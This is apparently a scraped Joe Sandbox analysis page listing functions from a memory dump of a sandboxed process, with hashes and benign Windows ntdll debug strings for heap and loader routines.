Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 5bb7f2c7eed1b9034766ca1e6b6554d20e58dcd34ba6423290f62e3205e3a3a6
Instruction ID: 24b0c523542aea7bf51c8e34e3fd10a2c8acb2ba428e1438a0ca175346357789
Opcode Fuzzy Hash: 5bb7f2c7eed1b9034766ca1e6b6554d20e58dcd34ba6423290f62e3205e3a3a6
Instruction Fuzzy Hash: 21D10F39900785DFCB02CFA8C490AAABBF2FF89314F05865DE645AB612D735A941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 1EA00680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 1EA54EBB
HEAP: , xrefs: 1EA54ECA
(UCRBlock->Size >= *Size), xrefs: 1EA54ED7

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 26982e91f3027784a1974d71ac6240fe61a758aa084a9108eb4bc8d7d014df61
Instruction ID: bb43704af67f4534bb99cab92b8ab0f3a9a236323ea29d4e3e653058ed3bad6c
Opcode Fuzzy Hash: 26982e91f3027784a1974d71ac6240fe61a758aa084a9108eb4bc8d7d014df61
Instruction Fuzzy Hash: C6F1CB70A00642DFDB05CF69D890B6AB7F6FF44300F208AA8E5469B381D774ED81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 1EACACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EACAEA9
RtlDebugPrintTimes.NTDLL ref: 1EACB185

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6051c57a3f19ef26ce20092e4d32ce6ccda2c1321118ade67225147b90f190d0
Instruction ID: e592507e03efc0ed7b54317f551f616bf0bf139958c6939dda085deec9d402fc
Opcode Fuzzy Hash: 6051c57a3f19ef26ce20092e4d32ce6ccda2c1321118ade67225147b90f190d0
Instruction Fuzzy Hash: 76F10772E006618FCB18CFA9C9A067DFBF6AF8820071A466DD457DB384D635EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EACA1F0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EACA25D
RtlDebugPrintTimes.NTDLL ref: 1EACA2F1
RtlDebugPrintTimes.NTDLL ref: 1EACA314
RtlDebugPrintTimes.NTDLL ref: 1EACA340
RtlDebugPrintTimes.NTDLL ref: 1EACA415
RtlDebugPrintTimes.NTDLL ref: 1EACA468
RtlDebugPrintTimes.NTDLL ref: 1EACA487
RtlDebugPrintTimes.NTDLL ref: 1EACA4B8

Strings

HEAP: , xrefs: 1EACA206

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 7712881d8c7e6b1db928f732716c6a27489ca20c29022b89bc9b0ec988550444
Instruction ID: 7c27adf60e55486e8ded48502bf165d27e3770da11b7d71111cf8f84d9fa5ae2
Opcode Fuzzy Hash: 7712881d8c7e6b1db928f732716c6a27489ca20c29022b89bc9b0ec988550444
Instruction Fuzzy Hash: ADA1A075A143228FD704CF28C8A4A2AB7E6FF88710F15466DE946DB321E730EC42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1EA27550, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 1EA64592
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1EA64530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1EA64507
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1EA64460
ExecuteOptions, xrefs: 1EA644AB
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1EA6454D
Execute=1, xrefs: 1EA6451E

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 88e6b7b622fbd5cc2c93ac449ea040cc3f5e104d1b209b87aa48f5f74668f169
Instruction ID: 22dce5c519eb246d086d81084f2d29af96bfd13bec3121125f39b59331df13b9
Opcode Fuzzy Hash: 88e6b7b622fbd5cc2c93ac449ea040cc3f5e104d1b209b87aa48f5f74668f169
Instruction Fuzzy Hash: 37512971A0025A6ADB109BA5DD95FAD77A9BF08304F500BF9F505B7180D730AF45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1EA0A170, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA57807
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA577E2
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1EA578F3
RtlpFindActivationContextSection_CheckParameters, xrefs: 1EA577DD, 1EA57802
SsHd, xrefs: 1EA0A304
Actx , xrefs: 1EA57819, 1EA57880

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 5d78ac92fa47c026b3da4a56916d03a1b27242d570caa47fbf90e478e011f532
Instruction ID: ecc5e163bbbad7c6ff5bdd8431571a4221ec423896015408d5c4a5e2a6ecc59f
Opcode Fuzzy Hash: 5d78ac92fa47c026b3da4a56916d03a1b27242d570caa47fbf90e478e011f532
Instruction Fuzzy Hash: C8E1AF74A043428FD715CE25E8A4B5A7BE2BF89324F104B2DF8659B390D731EC85CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1EA0D690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA59299

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA59178
GsHd, xrefs: 1EA0D794
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1EA59372
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1EA59153
RtlpFindActivationContextSection_CheckParameters, xrefs: 1EA5914E, 1EA59173
Actx , xrefs: 1EA59315

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: f997799eef0f0ae595c7531e98fe757abc02d42b40ed6d5146bd588b3102938a
Instruction ID: 5040935259cf31a68863bab70e1293599569207e90ded3fc4c6945dee55a50bb
Opcode Fuzzy Hash: f997799eef0f0ae595c7531e98fe757abc02d42b40ed6d5146bd588b3102938a
Instruction Fuzzy Hash: 7BE19F71604342CFD710CF29D880B5ABBE6BF89314F144B6DE9A58B381D771E948CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 1EA9F0A5, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA9F0D6

Strings

HEAP[%wZ]: , xrefs: 1EA9F267, 1EA9F314, 1EA9F36B
HEAP: , xrefs: 1EA9F274, 1EA9F321, 1EA9F378
Just allocated block at %p for %Ix bytes, xrefs: 1EA9F288
RtlAllocateHeap, xrefs: 1EA9F0ED
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1EA9F389
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 1EA9F33E

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 97143fd49e718d032f4d7a4dbe9e9f83c5758c9ed3aa95c5c353501c10cf9225
Instruction ID: c2edf468c01b9f55ba9c1f7b91e035f54797fcbf55a026acc32f7d90dc6feeb7
Opcode Fuzzy Hash: 97143fd49e718d032f4d7a4dbe9e9f83c5758c9ed3aa95c5c353501c10cf9225
Instruction Fuzzy Hash: 74912139900685DFCB02CFA8C440AAEBBFAFF89310F14865DE551AB751C735A981EB58

Uniqueness

Uniqueness Score: -1.00%

Function 1E9E640D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9E651C

Part of subcall function 1E9E6565: RtlDebugPrintTimes.NTDLL ref: 1E9E6614
Part of subcall function 1E9E6565: RtlDebugPrintTimes.NTDLL ref: 1E9E665F

Strings

LdrpInitShimEngine, xrefs: 1EA49783, 1EA49796, 1EA497BF
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1EA4977C
Getting the shim engine exports failed with status 0x%08lx, xrefs: 1EA49790
apphelp.dll, xrefs: 1E9E6446
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1EA497B9
minkernel\ntdll\ldrinit.c, xrefs: 1EA497A0, 1EA497C9

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 748d9bd65d840b03f497ce1e604976ec0c80ecce226a5fdc9cffa52200b21b69
Instruction ID: 70bf2900e9e7f11e5f43e2a723f0e045f303298e82f930b16955e197c9d008bc
Opcode Fuzzy Hash: 748d9bd65d840b03f497ce1e604976ec0c80ecce226a5fdc9cffa52200b21b69
Instruction Fuzzy Hash: 3A51C0752083529FD311CF24C890BAB77E4FF84614F184B5DF6859B651EB30EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 1EA6FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA6FAF3
RtlDebugPrintTimes.NTDLL ref: 1EA6FB15

Strings

$, xrefs: 1EA6FABD
minkernel\ntdll\ldrdload.c, xrefs: 1EA6FA68
Unknown, xrefs: 1EA6FA42, 1EA6FA54
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 1EA6FA58
LdrpRedirectDelayloadFailure, xrefs: 1EA6FA5E

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 2c9a5b4a1de290a18a8eee50a072a97ae977a1edf6b81c8044e348a3f100c77a
Instruction ID: 91205c61b8bf3ce50f900d0018d2564ad252b5ada37b82d0193cab696b1a3922
Opcode Fuzzy Hash: 2c9a5b4a1de290a18a8eee50a072a97ae977a1edf6b81c8044e348a3f100c77a
Instruction Fuzzy Hash: A1417FB9A00219AFCB01CF99C990AEEBBBAFF49354F544269E904B7340D7319E41DB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EA9F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA9F92E

Strings

HEAP[%wZ]: , xrefs: 1EA9F9EC, 1EA9FAD7
HEAP: , xrefs: 1EA9F9F9, 1EA9FAE4
RtlFreeHeap, xrefs: 1EA9F948, 1EA9F9B2
About to free block at %p, xrefs: 1EA9FA0A
About to free block at %p with tag %ws, xrefs: 1EA9FAFE

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 66a3d225aeac7d2dc8d6bd73a3ea4950a7d5fbd63786c8bf3ff994ce82ebb0b9
Instruction ID: 2446381c687bbd169ff2f434b8b2fb8bf4790d708ddb602405ecb3c590291a89
Opcode Fuzzy Hash: 66a3d225aeac7d2dc8d6bd73a3ea4950a7d5fbd63786c8bf3ff994ce82ebb0b9
Instruction Fuzzy Hash: D371F0399006859FCB02CFA8C4A06BDFBFAFF89304F148659E445AB751C731AD81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 1E9E6565, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E9E6614
RtlDebugPrintTimes.NTDLL ref: 1E9E665F

Strings

LdrpLoadShimEngine, xrefs: 1EA4984A, 1EA4988B
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA49843
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA49885
minkernel\ntdll\ldrinit.c, xrefs: 1EA49854, 1EA49895

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: ef6902c12dbd6c028c99a9d4b3bbd897f045f14f28fa3dfd1065e1ad9a8f7af3
Instruction ID: 43c3f0f06504e39a4d96983fd8dc6e34ee4f10332b8f5a2d5546f4f95ae36549
Opcode Fuzzy Hash: ef6902c12dbd6c028c99a9d4b3bbd897f045f14f28fa3dfd1065e1ad9a8f7af3
Instruction Fuzzy Hash: 27514675A103A59FCB05CBACCC94AED77B6BB84710F180769E641BF286DB70AC05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1D6D0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA1D879

Part of subcall function 1E9F4779: RtlDebugPrintTimes.NTDLL ref: 1E9F4817

Strings

$, xrefs: 1EA1D820
$, xrefs: 1EA1D78D
Process 0x%p (%wZ) exiting, xrefs: 1EA5F0D1
LdrShutdownProcess, xrefs: 1EA5F0D8
minkernel\ntdll\ldrinit.c, xrefs: 1EA5F0E2

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 2f9160ebc28fa975357bb940dfc885d0bcacfea42de34f90e2052110b0537ffc
Instruction ID: 3480dd476f545fc1954f026fa6cffed38a1e6397e0b4ec6002a5fee6c6df3227
Opcode Fuzzy Hash: 2f9160ebc28fa975357bb940dfc885d0bcacfea42de34f90e2052110b0537ffc
Instruction Fuzzy Hash: D151E17AE043969FDB04DFA8C58479EBBB2BF84314F244659D4007F281E774A986CBC8

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1DA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA5F41B

Strings

HEAP[%wZ]: , xrefs: 1EA5F444
HEAP: , xrefs: 1EA5F451
, passed to %s, xrefs: 1EA5F46C
RtlUnlockHeap, xrefs: 1EA5F467
Invalid heap signature for heap at %p, xrefs: 1EA5F45D

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 84258e29c589617eab6ede0b1c44a1610a7c5a9abedde747ac5e1fca48c6b344
Instruction ID: 19c8b4c9aca76893682215a5c06f2b8b2f77736cede956a7e055f717f0bec030
Opcode Fuzzy Hash: 84258e29c589617eab6ede0b1c44a1610a7c5a9abedde747ac5e1fca48c6b344
Instruction Fuzzy Hash: 4A413839914681DFC721DF24C594B69B3B9FF41324F148B69E4065B781C738AD80CB99

Uniqueness

Uniqueness Score: -1.00%

Function 1EA9ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA9EDD0
RtlDebugPrintTimes.NTDLL ref: 1EA9EE45

Strings

HEAP: , xrefs: 1EA9ECDD
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1EA9EDE3
Entry Heap Size , xrefs: 1EA9EDED
---------------------------------------, xrefs: 1EA9EDF9

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 82af461a229d8effc575459a6618064452ff0106b8d2b178b7d84bded182c68f
Instruction ID: ae574d3e3899a891d76522cfdb7551877926d38a124da9960a99d05aaec4ca56
Opcode Fuzzy Hash: 82af461a229d8effc575459a6618064452ff0106b8d2b178b7d84bded182c68f
Instruction Fuzzy Hash: EC419D35A00626DFC705CF19C48495ABBEAFF49314B26C6ADE608AF712D731EC42DB94

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1DAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA5F561

Strings

HEAP[%wZ]: , xrefs: 1EA5F58A
HEAP: , xrefs: 1EA5F597
, passed to %s, xrefs: 1EA5F5B2
RtlLockHeap, xrefs: 1EA5F5AD
Invalid heap signature for heap at %p, xrefs: 1EA5F5A3

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 1efba5d9c710823f48f5d9b0372f3bbeaa48fa2acfc901216436ac7d9d639f9b
Instruction ID: 6dcd125013c4d7887984d7d934d36b1570cdc5c619167457ad277388f792d90d
Opcode Fuzzy Hash: 1efba5d9c710823f48f5d9b0372f3bbeaa48fa2acfc901216436ac7d9d639f9b
Instruction Fuzzy Hash: 093121395146C49FD722EB28C818B9977ADEF41624F004B89E4034BB91C779BD80CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 1E9F9046, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA52360

Strings

$, xrefs: 1E9F90B1
@, xrefs: 1E9F9095

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 84e420a1a60780436c275aa063d08345a82871f60a553e03ef52ac99b63138e7
Instruction ID: b7cb2ce0d9d5228c33feeb0a8fccd88e7a02f6157be30456989a541a49a3b954
Opcode Fuzzy Hash: 84e420a1a60780436c275aa063d08345a82871f60a553e03ef52ac99b63138e7
Instruction Fuzzy Hash: 7F812BB1D00269DBDB21CF94CD44BEEB6B8AF48714F0446EAE909B7240D7709E85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 1EA24C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1EA24C84

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 1EA63466
minkernel\ntdll\ldrsnap.c, xrefs: 1EA6344A, 1EA63476
LdrpFindDllActivationContext, xrefs: 1EA63440, 1EA6346C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1EA63439

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: c1aa2d303c93b73f8687bb095e586cf44436bd898b80068759445b6ae54fda3a
Instruction ID: f09ad54f7714df643571ff042404c42e0ee503505ae7630405753824bce43cee
Opcode Fuzzy Hash: c1aa2d303c93b73f8687bb095e586cf44436bd898b80068759445b6ae54fda3a
Instruction Fuzzy Hash: A9310972E003A3AFD711EB0DC894B65BAB6FB45754F82C37AD5017B250D7609C80C799

Uniqueness

Uniqueness Score: -1.00%

Function 1EA1237A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1EA5A79F
apphelp.dll, xrefs: 1EA12382
LdrpDynamicShimModule, xrefs: 1EA5A7A5
minkernel\ntdll\ldrinit.c, xrefs: 1EA5A7AF

Memory Dump Source

Source File: 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, Offset: 1E9C0000, based on PE: true

Associated: 0000001C.00000002.51546718335.000000001EAE9000.00000040.00000001.sdmp Download File
Associated: 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1e9c0000_c8ahotgz8h.jbxd

Similarity

API ID:
